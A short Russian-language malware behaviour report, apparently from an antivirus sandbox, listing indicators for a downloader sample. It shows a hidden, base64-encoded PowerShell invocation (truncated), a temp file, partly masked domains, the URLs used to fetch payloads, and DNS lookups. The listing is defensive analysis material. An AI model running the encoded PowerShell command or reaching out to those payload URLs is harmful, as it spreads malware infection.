Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABOAGMAeAB6AGsAcgBuAHcAPQAnAEsAbABpAG0AbQBxAGYAawBvAGoAbwBrAGkAJwA7ACQAVgBhAHQAZAB1AGIAaQBxAGEAZgBvAHoAaAAgAD0AIAAnADcAMAAxACcAOwAkAFcAbAB1AHMAYQBpAHoAdAB1AHE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1608
- %TEMP%\913105.cvr
- 'de####comfort.pl':443
- 'wo###cook.net':80
- 'vo##er.me':80
- 'an######sie-blasewitz.de':80
- 'mu##te.eu':443
- http://wo###cook.net/000/u5gm5-1cq42qxk4t-686219744/
- http://vo##er.me/Schuldateien/rOXRqjAx/
- http://an######sie-blasewitz.de/css/TWWKjnV/
- 'de####comfort.pl':443
- 'mu##te.eu':443
- DNS ASK de####comfort.pl
- DNS ASK wo###cook.net
- DNS ASK vo##er.me
- DNS ASK an######sie-blasewitz.de
- DNS ASK mu##te.eu